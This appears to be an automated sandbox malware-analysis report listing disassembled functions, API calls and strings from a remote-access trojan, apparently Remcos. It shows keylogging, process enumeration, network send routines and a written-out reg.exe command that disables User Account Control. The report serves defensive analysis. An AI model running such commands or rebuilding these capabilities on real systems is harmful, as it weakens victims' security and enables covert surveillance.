                                                              • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                              • wsprintfW.USER32 ref: 0040B22E
                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EventLocalTimewsprintf
                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                              • API String ID: 1497725170-248792730
                                                              • Opcode ID: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                              • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                              • Opcode Fuzzy Hash: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                              • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                              • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                              • String ID: XQG
                                                              • API String ID: 1958988193-3606453820
                                                              • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                              • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                              • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                              • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                              APIs
                                                              • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                              • GetLastError.KERNEL32 ref: 0041D611
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                              • String ID: 0$MsgWindowClass
                                                              • API String ID: 2877667751-2410386613
                                                              • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                              • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                              • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                              • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                              APIs
                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                              • CloseHandle.KERNEL32(?), ref: 004077E5
                                                              • CloseHandle.KERNEL32(?), ref: 004077EA
                                                              Strings
                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                              • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CreateProcess
                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                              • API String ID: 2922976086-4183131282
                                                              • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                              • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                              • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                              • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe, xrefs: 004076FF
                                                              • SG, xrefs: 00407715
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: SG$C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                              • API String ID: 0-3843410488
                                                              • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                              • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                              • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                              • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                              • SetEvent.KERNEL32(?), ref: 0040512C
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                              • CloseHandle.KERNEL32(?), ref: 00405140
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                              • String ID: KeepAlive | Disabled
                                                              • API String ID: 2993684571-305739064
                                                              • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                              • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                              • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                              • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                              APIs
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                              • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                              • String ID: Alarm triggered
                                                              • API String ID: 614609389-2816303416
                                                              • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                              • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                              • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                              • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                              Strings
                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                              • API String ID: 3024135584-2418719853
                                                              • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                              • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                              • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                              • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                              • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                              • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                              • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                              APIs
                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                              • _free.LIBCMT ref: 0044943D
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 00449609
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                              • String ID:
                                                              • API String ID: 1286116820-0
                                                              • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                              • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                              • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                              • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                              APIs
                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 4269425633-0
                                                              • Opcode ID: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                                              • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                              • Opcode Fuzzy Hash: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                                              • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                              • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                              • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                              • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                              • _free.LIBCMT ref: 0044F43F
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                              • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                              • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                              • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreatePointerWrite
                                                              • String ID:
                                                              • API String ID: 1852769593-0
                                                              • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                              • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                              • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                              • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                              • _free.LIBCMT ref: 00448353
                                                              • _free.LIBCMT ref: 0044837A
                                                              • SetLastError.KERNEL32(00000000), ref: 00448387
                                                              • SetLastError.KERNEL32(00000000), ref: 00448390
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                              • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                              • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                              • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                              APIs
                                                              • _free.LIBCMT ref: 00450A54
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 00450A66
                                                              • _free.LIBCMT ref: 00450A78
                                                              • _free.LIBCMT ref: 00450A8A
                                                              • _free.LIBCMT ref: 00450A9C
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                              • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                              • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                              • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                              APIs
                                                              • _free.LIBCMT ref: 00444106
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 00444118
                                                              • _free.LIBCMT ref: 0044412B
                                                              • _free.LIBCMT ref: 0044413C
                                                              • _free.LIBCMT ref: 0044414D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                              • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                              • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                              • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PkGNG
                                                              • API String ID: 0-263838557
                                                              • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                              • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                                              • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                              • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                                              APIs
                                                              • _strpbrk.LIBCMT ref: 0044E7B8
                                                              • _free.LIBCMT ref: 0044E8D5
                                                                • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                                • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                                                • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                              • String ID: *?$.
                                                              • API String ID: 2812119850-3972193922
                                                              • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                              • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                              • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                              • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CountEventTick
                                                              • String ID: !D@$NG
                                                              • API String ID: 180926312-2721294649
                                                              • Opcode ID: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                              • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                              • Opcode Fuzzy Hash: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                              • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                              APIs
                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                              • String ID: XQG$NG$PG
                                                              • API String ID: 1634807452-3565412412
                                                              • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                              • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                              • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                              • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000104), ref: 00443515
                                                              • _free.LIBCMT ref: 004435E0
                                                              • _free.LIBCMT ref: 004435EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
